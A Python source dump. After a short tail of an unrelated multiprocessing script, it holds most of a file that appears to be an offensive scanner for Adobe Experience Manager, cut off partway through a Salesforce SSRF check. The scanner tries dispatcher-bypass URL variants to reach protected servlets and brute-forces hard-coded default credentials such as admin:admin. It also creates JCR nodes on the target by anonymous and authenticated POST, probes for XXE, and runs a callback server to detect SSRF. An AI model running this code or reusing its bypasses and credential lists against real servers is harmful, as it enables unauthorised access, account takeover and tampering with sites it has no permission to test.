vis=False,
infer=False,
action_noise=action_noise,
param_noise=param_noise,
action_noise_prob=args.action_noise_prob,
param_noise_prob=args.param_noise_prob,
id=sampler_id,
)
p = mp.Process(target=run_sampler, kwargs=dict(**params, **params_))
p.start()
processes.append(p)
sampler_id += 1
for p in processes:
p.join()
if __name__ == "__main__":
args, unknown_args = parse_args()
main(args, unknown_args)
|
aem_hacker.py
|
#! /usr/bin/env python
import concurrent.futures
import itertools
import json
import datetime
import traceback
import sys
import argparse
import base64
import time
from collections import namedtuple
from http.server import BaseHTTPRequestHandler, HTTPServer
from random import choice, randint
from string import ascii_letters
from threading import Thread
import requests
requests.packages.urllib3.disable_warnings()
CREDS = ('admin:admin',
'admin:password',
'author:author',
'grios:password',
'replication-receiver:replication-receiver',
'vgnadmin:vgnadmin')
def random_string(length=10):
return ''.join([choice(ascii_letters) for _ in range(length)])
registered = {} # Registered checks
token = random_string() # Token to recognize SSRF was triggered
d = {} # store SSRF detections
extra_headers = {}
class Detector(BaseHTTPRequestHandler):
def __init__(self, token, d, *args):
self.d = d
self.token = token
BaseHTTPRequestHandler.__init__(self, *args)
def log_message(self, format, *args):
return
def do_GET(self):
self.serve()
def do_POST(self):
self.serve()
def do_PUT(self):
self.serve()
def serve(self):
try:
token, key, value = self.path.split('/')[1:4]
except:
self.send_response(200)
return
if self.token != token:
self.send_response(200)
return
if key in self.d:
self.d[key].append(value)
else:
self.d[key] = [value, ]
self.send_response(200)
def register(name):
def decorator(func):
registered[name] = func
return func
return decorator
Finding = namedtuple('Finding', 'name, url, description')
def normalize_url(base_url, path):
if base_url[-1] == '/' and (path[0] == '/' or path[0] == '\\'):
url = base_url[:-1] + path
else:
url = base_url + path
return url
def content_type(ct):
return ct.split(';')[0].lower().strip()
def error(message, **kwargs):
print('[{}] {}'.format(datetime.datetime.now().time(), message), sys.stderr)
for n, a in kwargs.items():
print('\t{}={}'.format(n, a), sys.stderr)
exc_type, exc_value, exc_traceback = sys.exc_info()
print('Exception type:' + str(exc_type), sys.stderr)
print('Exception value:' + str(exc_value), sys.stderr)
print('TRACE:', sys.stderr)
traceback.print_tb(exc_traceback, file=sys.stderr)
print('\n\n\n', sys.stderr)
def http_request(url, method='GET', data=None, additional_headers=None, proxy=None, debug=False):
headers = {'User-Agent': 'curl/7.30.0'}
if additional_headers:
headers.update(additional_headers)
if extra_headers:
headers.update({
# Retrieve the headers configured as extra headers but not controlled
# by the application in this specific request
h_name: h_value
for h_name, h_value in extra_headers.items()
if h_name not in headers
})
if not proxy:
proxy = {}
if debug:
print('>> Sending {} {}'.format(method, url))
resp = requests.request(method, url, data=data, headers=headers, proxies=proxy, verify=False, timeout=40, allow_redirects=False)
if debug:
print('<< Received HTTP-{}', resp.status_code)
return resp
def http_request_multipart(url, method='POST', data=None, additional_headers=None, proxy=None, debug=False):
headers = {'User-Agent': 'curl/7.30.0'}
if additional_headers:
headers.update(additional_headers)
if extra_headers:
headers.update({
# Retrieve the headers configured as extra headers but not controlled
# by the application in this specific request
h_name: h_value
for h_name, h_value in extra_headers.items()
if h_name not in headers
})
if not proxy:
proxy = {}
if debug:
print('>> Sending {} {}'.format(method, url))
resp = requests.request(method, url, files=data, headers=headers, proxies=proxy, verify=False, timeout=40, allow_redirects=False)
if debug:
print('<< Received HTTP-{}', resp.status_code)
return resp
def preflight(url, proxy=None, debug=False):
try:
http_request(url, proxy=proxy, debug=debug)
except:
return False
else:
return True
@register('set_preferences')
def exposed_set_preferences(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
SETPREFERENCES = itertools.product(('/crx/de/setPreferences.jsp', '///crx///de///setPreferences.jsp'),
(';%0a{0}.html', '/{0}.html'),
('?keymap=<1337>&language=0',))
SETPREFERENCES = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in SETPREFERENCES)
results = []
for path in SETPREFERENCES:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy)
if resp.status_code == 400:
if '<1337>' in resp.content.decode():
f = Finding('SetPreferences', url,
'Page setPreferences.jsp is exposed, XSS might be possible via keymap parameter.')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_set_preferences', url=url)
return results
@register('merge_metadata')
def exposed_merge_metadata(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
MERGEMETADATA = itertools.product(('/libs/dam/merge/metadata', '///libs///dam///merge///metadata'),
('.html', '.css/{0}.html', '.ico/{0}.html', '....4.2.1....json/{0}.html',
'.css;%0a{0}.html', '.ico;%0a{0}.html'),
('?path=/etc&.ico',))
MERGEMETADATA = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in MERGEMETADATA)
results = []
for path in MERGEMETADATA:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy)
if resp.status_code == 200:
try:
json.loads(resp.content.decode())['assetPaths']
except:
pass
else:
f = Finding('MergeMetadataServlet', url,
'MergeMetadataServlet is exposed, XSS might be possible via path parameter.')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_merge_metadata', url=url)
return results
@register('get_servlet')
def exposed_get_servlet(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
GETSERVLET = itertools.product(('/', '/etc', '/var', '/apps', '/home', '///etc', '///var', '///apps', '///home'),
('', '.children'),
('.json', '.1.json', '....4.2.1....json', '.json?{0}.css', '.json?{0}.ico', '.json?{0}.html',
'.json/{0}.css', '.json/{0}.html', '.json/{0}.png', '.json/{0}.ico',
'.json;%0a{0}.css', '.json;%0a{0}.png', '.json;%0a{0}.html', '.json;%0a{0}.ico'))
GETSERVLET = list('{0}{1}{2}'.format(p1, p2, p3.format(r)) for p1, p2, p3 in GETSERVLET)
results = []
for path in GETSERVLET:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy)
if resp.status_code == 200:
try:
json.loads(resp.content.decode())
if not 'jcr:primaryType' in resp.content.decode():
raise Exception()
except:
pass
else:
f = Finding('DefaultGetServlet', url,
'Sensitive information might be exposed via AEM\'s DefaultGetServlet. '
'Check child nodes manually for secrets exposed, see - '
'https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43')
results.append(f)
except:
if debug:
error('Exception while performing a check', check='exposed_get_servlet', url=url)
return results
@register('querybuilder_servlet')
def exposed_querybuilder_servlet(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
QUERYBUILDER = itertools.product(('/bin/querybuilder.json', '///bin///querybuilder.json', '/bin/querybuilder.feed', '///bin///querybuilder.feed'),
('', '.css', '.ico', '.png', '.gif', '.html', '.1.json', '....4.2.1....json',
';%0a{0}.css', ';%0a{0}.png', ';%0a{0}.html', ';%0a{0}.ico', '.ico;%0a{0}.ico',
'.css;%0a{0}.css', '.html;%0a{0}.html', '?{0}.css', '?{0}.ico'))
QUERYBUILDER = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in QUERYBUILDER)
results = []
found_json = False
found_feed = False
for path in QUERYBUILDER:
if found_feed and found_json:
break
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy)
if resp.status_code == 200:
try:
json.loads(resp.content.decode())['hits']
except:
pass
else:
if found_json:
continue
f = Finding('QueryBuilderJsonServlet', url,
'Sensitive information might be exposed via AEM\'s QueryBuilderJsonServlet. '
'See - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html')
results.append(f)
found_json = True
if '</feed>' in str(resp.content):
if found_feed:
continue
f = Finding('QueryBuilderFeedServlet', url,
'Sensitive information might be exposed via AEM\'s QueryBuilderFeedServlet. '
'See - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html')
results.append(f)
found_feed = True
except:
if debug:
error('Exception while performing a check', check='exposed_querybuilder_servlet', url=url)
return results
@register('gql_servlet')
def exposed_gql_servlet(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
GQLSERVLET = itertools.product(('/bin/wcm/search/gql', '///bin///wcm///search///gql'),
('.json', '....1....json', '.json/{0}.css', '.json/{0}.html', '.json/{0}.ico', '.json/{0}.png',
'.json;%0a{0}.css', '.json;%0a{0}.ico', '.json;%0a{0}.html', '.json;%0a{0}.png'),
('?query=type:User%20limit:..1&pathPrefix=&p.ico',))
GQLSERVLET = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in GQLSERVLET)
results = []
for path in GQLSERVLET:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy)
if resp.status_code == 200:
try:
json.loads(resp.content.decode())['hits']
except:
pass
else:
f = Finding('GQLServlet', url,
'Sensitive information might be exposed via AEM\'s GQLServlet. '
'See - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_gql_servlet', url=url)
return results
@register('guide_internal_submit_servlet')
def exposed_guide_internal_submit_servlet_xxe(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
GuideInternalSubmitServlet = itertools.product(('/content/forms/af/geometrixx-gov/application-for-assistance/jcr:content/guideContainer',
'/content/forms/af/geometrixx-gov/geometrixx-survey-form/jcr:content/guideContainer',
'/content/forms/af/geometrixx-gov/hardship-determination/jcr:content/guideContainer',
'/libs/fd/af/components/guideContainer/cq:template',
'///libs///fd///af///components///guideContainer///cq:template',
'/libs/fd/af/templates/simpleEnrollmentTemplate2/jcr:content/guideContainer',
'///libs///fd///af///templates///simpleEnrollmentTemplate2///jcr:content///guideContainer',
'/libs/fd/af/templates/surveyTemplate2/jcr:content/guideContainer',
'///libs///fd///af///templates///surveyTemplate2///jcr:content///guideContainer',
'/libs/fd/af/templates/blankTemplate2/jcr:content/guideContainer',
'///libs///fd///af///templates///blankTemplate2///jcr:content///guideContainer',
'/libs/fd/af/templates/surveyTemplate/jcr:content/guideContainer',
'/libs/fd/af/templates/surveyTemplate/jcr:content/guideContainer',
'///libs///fd///af///templates///surveyTemplate///jcr:content///guideContainer',
'/libs/fd/af/templates/tabbedEnrollmentTemplate/jcr:content/guideContainer',
'///libs///fd///af///templates///tabbedEnrollmentTemplate///jcr:content///guideContainer',
'/libs/fd/af/templates/tabbedEnrollmentTemplate2/jcr:content/guideContainer',
'///libs///fd///af///templates///tabbedEnrollmentTemplate2///jcr:content///guideContainer',
'/libs/fd/af/templates/simpleEnrollmentTemplate/jcr:content/guideContainer',
'///libs///fd///af///templates///simpleEnrollmentTemplate///jcr:content///guideContainer',
'/libs/settings/wcm/template-types/afpage/initial/jcr:content/guideContainer',
'///libs///settings///wcm///template-types///afpage///initial///jcr:content///guideContainer',
'/libs/settings/wcm/template-types/afpage/structure/jcr:content/guideContainer',
'///libs///settings///wcm///template-types///afpage///structure///jcr:content///guideContainer',
'/apps/geometrixx-gov/templates/enrollment-template/jcr:content/guideContainer',
'/apps/geometrixx-gov/templates/survey-template/jcr:content/guideContainer',
'/apps/geometrixx-gov/templates/tabbed-enrollment-template/jcr:content/guideContainer'),
('.af.internalsubmit.json', '.af.internalsubmit.1.json', '.af.internalsubmit...1...json',
'.af.internalsubmit.html', '.af.internalsubmit.js', '.af.internalsubmit.css',
'.af.internalsubmit.ico', '.af.internalsubmit.png', '.af.internalsubmit.gif',
'.af.internalsubmit.svg', '.af.internalsubmit.ico;%0a{0}.ico',
'.af.internalsubmit.html;%0a{0}.html', '.af.internalsubmit.css;%0a{0}.css'))
GuideInternalSubmitServlet = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in GuideInternalSubmitServlet)
results = []
for path in GuideInternalSubmitServlet:
url = normalize_url(base_url, path)
try:
data = 'guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<afData>\u0041\u0042\u0043</afData>"}}}'
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy)
if resp.status_code == 200 and '<afData>ABC' in str(resp.content):
f = Finding('GuideInternalSubmitServlet', url,
'GuideInternalSubmitServlet is exposed, XXE is possible.')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_guide_internal_submit_servlet_xxe', url=url)
return results
@register('post_servlet')
def exposed_post_servlet(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
POSTSERVLET = itertools.product(('/', '/content', '/content/dam'),
('.json', '.1.json', '...4.2.1...json', '.json/{0}.css', '.json/{0}.html',
'.json;%0a{0}.css', '.json;%0a{0}.html'))
POSTSERVLET = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in POSTSERVLET)
results = []
for path in POSTSERVLET:
url = normalize_url(base_url, path)
try:
data = ':operation=nop'
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'Null Operation Status:' in str(resp.content):
f = Finding('POSTServlet', url,
'POSTServlet is exposed, persistent XSS or RCE might be possible, it depends on your privileges.')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_post_servlet', url=url)
return results
@register('create_new_nodes')
def create_new_nodes(base_url, my_host, debug=False, proxy=None):
CREDS = ('admin:admin', 'author:author', 'admin:password')
nodename1 = random_string()
r1 = random_string(3)
POSTSERVLET1 = itertools.product(('/content/usergenerated/etc/commerce/smartlists/', '/content/usergenerated/'),
('*', '{0}.json', '{0}.1.json', '{0}.json/{1}.css', '{0}.json/{1}.html',
'{0}.json/{1}.ico', '{0}.json/{1}.png', '{0}.json/{1}.1.json',
'{0}.json;%0a{1}.css', '{0}.json;%0a{1}.html', '{0}.json;%0a{1}.png',
'{0}.json;%0a{1}.ico', '{0}....4.2.1....json', '{0}?{1}.ico',
'{0}?{1}.css', '{0}?{1}.html', '{0}?{1}.json', '{0}?{1}.1.json',
'{0}?{1}....4.2.1....json'))
POSTSERVLET1 = list('{0}{1}'.format(p1, p2.format(nodename1, r1)) for p1, p2 in POSTSERVLET1)
nodename2 = random_string()
r2 = random_string(3)
POSTSERVLET2 = itertools.product(('/', '/content/', '/apps/', '/libs/'),
('*', '{0}.json', '{0}.1.json', '{0}.json/{1}.css',
'{0}.json/{1}.html', '{0}.json/{1}.ico', '{0}.json/{1}.png',
'{0}.json/{1}.1.json', '{0}.json;%0a{1}.css', '{0}.json;%0a{1}.html',
'{0}.json;%0a{1}.png', '{0}.json;%0a{1}.ico', '{0}....4.2.1....json',
'{0}?{1}.ico', '{0}?{1}.css', '{0}?{1}.html', '{0}?{1}.json',
'{0}?{1}.1.json', '{0}?{1}....4.2.1....json'))
POSTSERVLET2 = list('{0}{1}'.format(p1, p2.format(nodename2, r2)) for p1, p2 in POSTSERVLET2)
results = []
for path in POSTSERVLET1:
url = normalize_url(base_url, path)
try:
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
resp = http_request(url, 'POST', additional_headers=headers, proxy=proxy)
if '<td>Parent Location</td>' in str(resp.content) and resp.status_code in [200, 201]:
f = Finding('CreateJCRNodes', url,
'It\'s possible to create new JCR nodes using POST Servlet as anonymous user. '
'You might get persistent XSS or perform other attack by accessing servlets registered by Resource Type.')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='create_new_nodes', url=url)
for path, creds in itertools.product(POSTSERVLET2, CREDS):
url = normalize_url(base_url, path)
try:
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url,
'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
data = 'a=b'
resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy)
if '<td>Parent Location</td>' in str(resp.content) and resp.status_code in [200, 201]:
f = Finding('CreateJCRNodes', url,
'It\'s possible to create new JCR nodes using POST Servlet as "{0}" user. '
'You might get persistent XSS or RCE.'.format(creds))
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='create_new_nodes', url=url)
return results
@register('create_new_nodes2')
def create_new_nodes2(base_url, my_host, debug=False, proxy=None):
CREDS = ('admin:admin', 'author:author', 'admin:password', 'grios:password', '[email protected]:aparker', '[email protected]:jdoe',
'[email protected]:password', '[email protected]:password',
'[email protected]:password', '[email protected]:password')
nodename = random_string()
r = random_string(3)
POSTSERVLET = itertools.product(('/home/users/geometrixx/{0}/', ),
('*', '{0}.json', '{0}.1.json', '{0}.json/{1}.css',
'{0}.json/{1}.html', '{0}.json/{1}.ico', '{0}.json/{1}.png',
'{0}.json/{1}.1.json', '{0}.json;%0a{1}.css', '{0}.json;%0a{1}.html',
'{0}.json;%0a{1}.png', '{0}.json;%0a{1}.ico',
'{0}....4.2.1....json', '{0}?{1}.ico', '{0}?{1}.css',
'{0}?{1}.html', '{0}?{1}.json', '{0}?{1}.1.json',
'{0}?{1}....4.2.1....json'))
POSTSERVLET = list('{0}{1}'.format(p1, p2.format(nodename, r)) for p1, p2 in POSTSERVLET)
results = []
for path, creds in itertools.product(POSTSERVLET, CREDS):
path = path.format(creds.split(':')[0])
url = normalize_url(base_url, path)
try:
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url,
'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
data = 'a=b'
resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy)
if '<td>Parent Location</td>' in str(resp.content) and resp.status_code in [200, 201]:
f = Finding('CreateJCRNodes 2', url,
'It\'s possible to create new JCR nodes using POST Servlet. As Geometrixx user "{0}". '
'You might get persistent XSS or perform other attack by accessing servlets registered by Resource Type.'.format(creds))
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='create_new_nodes2', url=url)
return results
@register('loginstatus_servlet')
def exposed_loginstatus_servlet(base_url, my_host, debug=False, proxy=None):
global CREDS
r = random_string(3)
LOGINSTATUS = itertools.product(('/system/sling/loginstatus', '///system///sling///loginstatus'),
('.json', '.css', '.ico', '.png', '.gif', '.html', '.js', '.json/{0}.1.json',
'.json;%0a{0}.css', '.json;%0a{0}.html', '.json;%0a{0}.png',
'.json;%0a{0}.ico', '...4.2.1...json'))
LOGINSTATUS = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in LOGINSTATUS)
results = []
for path in LOGINSTATUS:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'authenticated=' in str(resp.content):
f = Finding('LoginStatusServlet', url,
'LoginStatusServlet is exposed, it allows to bruteforce credentials. '
'You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.')
results.append(f)
for creds in CREDS:
headers = {'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
resp = http_request(url, additional_headers=headers, proxy=proxy, debug=debug)
if 'authenticated=true' in str(resp.content):
f = Finding('AEM with default credentials', url,
'AEM with default credentials "{0}".'.format(creds))
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_loginstatus_servlet', url=url)
return results
#@register('currentuser_servlet')
def exposed_currentuser_servlet(base_url, my_host, debug=False, proxy=None):
global CREDS
r = random_string(3)
CURRENTUSER = itertools.product(('/libs/granite/security/currentuser', '///libs///granite///security///currentuser'),
('.json', '.css', '.ico', '.png', '.gif', '.html', '.js', '.json?{0}.css',
'.json/{0}.1.json', '.json;%0a{0}.css', '.json;%0a{0}.html', '.json;%0a{0}.js',
'.json;%0a{0}.ico', '...4.2.1...json'))
CURRENTUSER = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in CURRENTUSER)
results = []
for path in CURRENTUSER:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'authorizableId' in str(resp.content):
f = Finding('CurrentUserServlet', url,
'CurrentUserServlet is exposed, it allows to bruteforce credentials. '
'You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.')
results.append(f)
for creds in CREDS:
headers = {'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
resp = http_request(url, additional_headers=headers, proxy=proxy, debug=debug)
if 'anonymous' not in str(resp.content):
f = Finding('AEM with default credentials', url,
'AEM with default credentials "{0}".'.format(creds))
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_currentuser_servlet', url=url)
return results
@register('userinfo_servlet')
def exposed_userinfo_servlet(base_url, my_host, debug=False, proxy=None):
global CREDS
r = random_string(3)
USERINFO = itertools.product(('/libs/cq/security/userinfo', '///libs///cq///security///userinfo'),
('.json', '.css', '.ico', '.png', '.gif', '.html', '.js',
'.json?{0}.css', '.json/{0}.1.json',
'.json;%0a{0}.css', '.json;%0a{0}.html',
'.json;%0a{0}.ico', '...4.2.1...json'))
USERINFO = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in USERINFO)
results = []
for path in USERINFO:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'userID' in str(resp.content):
f = Finding('UserInfoServlet', url,
'UserInfoServlet is exposed, it allows to bruteforce credentials. '
'You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.')
results.append(f)
for creds in CREDS:
headers = {'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
resp = http_request(url, additional_headers=headers, proxy=proxy, debug=debug)
if 'anonymous' not in str(resp.content):
f = Finding('AEM with default credentials', url,
'AEM with default credentials "{0}".'.format(creds))
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_userinfo_servlet', url=url)
return results
@register('felix_console')
def exposed_felix_console(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
FELIXCONSOLE = itertools.product(('/system/console/bundles', '///system///console///bundles'),
('', '.json', '.1.json', '.4.2.1...json', '.css', '.ico', '.png', '.gif', '.html', '.js',
';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.png', '.json;%0a{0}.ico', '.servlet/{0}.css',
'.servlet/{0}.js', '.servlet/{0}.html', '.servlet/{0}.ico'))
FELIXCONSOLE = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in FELIXCONSOLE)
results = []
for path in FELIXCONSOLE:
url = normalize_url(base_url, path)
headers = {'Authorization': 'Basic YWRtaW46YWRtaW4='}
try:
resp = http_request(url, additional_headers=headers, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'Web Console - Bundles' in str(resp.content):
f = Finding('FelixConsole', url,
'Felix Console is exposed, you may get RCE by installing OSGI bundle. '
'See - https://github.com/0ang3el/aem-rce-bundle')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_felix_console', url=url)
return results
@register('wcmdebug_filter')
def exposed_wcmdebug_filter(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
WCMDEBUG = itertools.product(('/', '/content', '/content/dam'),
('.json', '.1.json', '...4.2.1...json', '.json/{0}.css',
'.json/{0}.html', '.json/{0}.ico', '.json;%0a{0}.css', '.json;%0a{0}.html', '.json;%0a{0}.ico'),
('?debug=layout',))
WCMDEBUG = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in WCMDEBUG)
results = []
for path in WCMDEBUG:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'res=' in str(resp.content) and 'sel=' in str(resp.content):
f = Finding('WCMDebugFilter', url,
'WCMDebugFilter exposed and might be vulnerable to reflected XSS (CVE-2016-7882). '
'See - https://medium.com/@jonathanbouman/reflected-xss-at-philips-com-e48bf8f9cd3c')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_wcmdebug_filter', url=url)
return results
@register('wcmsuggestions_servlet')
def exposed_wcmsuggestions_servlet(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
WCMSUGGESTIONS = itertools.product(('/bin/wcm/contentfinder/connector/suggestions', '///bin///wcm///contentfinder///connector///suggestions'),
('.json', '.css', '.html', '.ico', '.png', '.gif', '.json/{0}.1.json',
'.json;%0a{0}.css', '.json/{0}.css', '.json/{0}.ico',
'.json/{0}.html', '...4.2.1...json'),
('?query_term=path%3a/&pre=<1337abcdef>&post=yyyy',))
WCMSUGGESTIONS = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in WCMSUGGESTIONS)
results = []
for path in WCMSUGGESTIONS:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and '<1337abcdef>' in str(resp.content):
f = Finding('WCMSuggestionsServlet', url,
'WCMSuggestionsServlet exposed and might result in reflected XSS. '
'See - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=96')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_wcmsuggestions_servlet', url=url)
return results
@register('crxde_crx')
def exposed_crxde_crx(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
CRXDELITE = itertools.product(('/crx/de/index.jsp', '///crx///de///index.jsp'),
('', ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.js', ';%0a{0}.ico', '?{0}.css',
'?{0}.html', '?{0}.ico'))
CRXDELITE = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in CRXDELITE)
CRX = itertools.product(('/crx/explorer/browser/index.jsp', '///crx///explorer///browser///index.jsp'),
('', ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico', '?{0}.css',
'?{0}.html', '?{0}.ico'))
CRX = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in CRX)
CRXSEARCH = itertools.product(('/crx/explorer/ui/search.jsp', '/crx///explorer///ui///search.jsp'),
('', ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico',
'?{0}.css', '?{0}.html', '?{0}.ico'))
CRXSEARCH = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in CRXSEARCH)
CRXNAMESPACE = itertools.product(('/crx/explorer/ui/namespace_editor.jsp', '///crx/explorer///ui///namespace_editor.jsp'),
('', ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico', '?{0}.css',
'?{0}.html', '?{0}.ico')
)
CRXNAMESPACE = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in CRXNAMESPACE)
PACKMGR = itertools.product(('/crx/packmgr/index.jsp', '///crx///packmgr///index.jsp'),
('', ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico',
'?{0}.css', '?{0}.html', '?{0}.ico')
)
PACKMGR = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in PACKMGR)
results = []
for path in itertools.chain(CRXDELITE, CRX, CRXSEARCH, CRXNAMESPACE, PACKMGR):
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and ('CRXDE Lite' in str(resp.content) or 'Content Explorer' in str(resp.content) or
'CRX Package Manager' in str(resp.content) or 'Search for:' in str(resp.content) or
'Namespace URI' in str(resp.content)) :
f = Finding('CRXDE Lite/CRX', url, 'Sensitive information might be exposed. Check manually.')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_crxde_crx', url=url)
return results
#@register('reports')
def exposed_reports(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
DISKUSAGE = itertools.product(('/etc/reports/diskusage.html', '///etc/reports///diskusage.html'),
('/{0}.css', '/{0}.ico', ';%0a{0}.css', ';%0a{0}.ico'))
DISKUSAGE = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in DISKUSAGE)
results = []
for path in DISKUSAGE:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and ('Disk Usage' in str(resp.content)):
f = Finding('Disk Usage report', url, 'Disk Usage report are exposed.')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_reports', url=url)
return results
@register('salesforcesecret_servlet')
def ssrf_salesforcesecret_servlet(base_url, my_host, debug=False, proxy=None):
global token, d
results = []
SALESFORCESERVLET1 = itertools.product(
(
'/libs/mcm/salesforce/customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
'///libs///mcm///salesforce///customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
'/libs/mcm/salesforce/customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23',
'///libs///mcm///salesforce///customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23'
),
(
'.json', '.1.json', '.4.2.1...json', '.html'
)
)
SALESFORCESERVLET1 = list(pair[0].format(pair[1]) for pair in SALESFORCESERVLET1)
SALESFORCESERVLET2 = itertools.product(
(
'/libs/mcm/salesforce/customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
'///libs///mcm///salesforce///customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
'/libs/mcm/salesforce/customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23',
'///libs///mcm///salesforce///customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23'
),
(
'.html/{0}.1.json', '.html/{0}.4.2.1...json', '.html/{0}.css', '.html/{0}.js', '.html/{0}.png', '.html/{0}.bmp',
'.html;%0a{0}.css', '.html;%0a{0}.js', '.json;%0a{0}.css', '.html;%0a{0}.png', '.json;%0a{0}.png',
'.json;%0a{0}.html', '.json/{0}.css', '.json/{0}.js', '.json/{0}.png', '.json/a.gif', '.json/{0}.ico', '.json/{0}.html'
)
)
cache_buster = random_string()
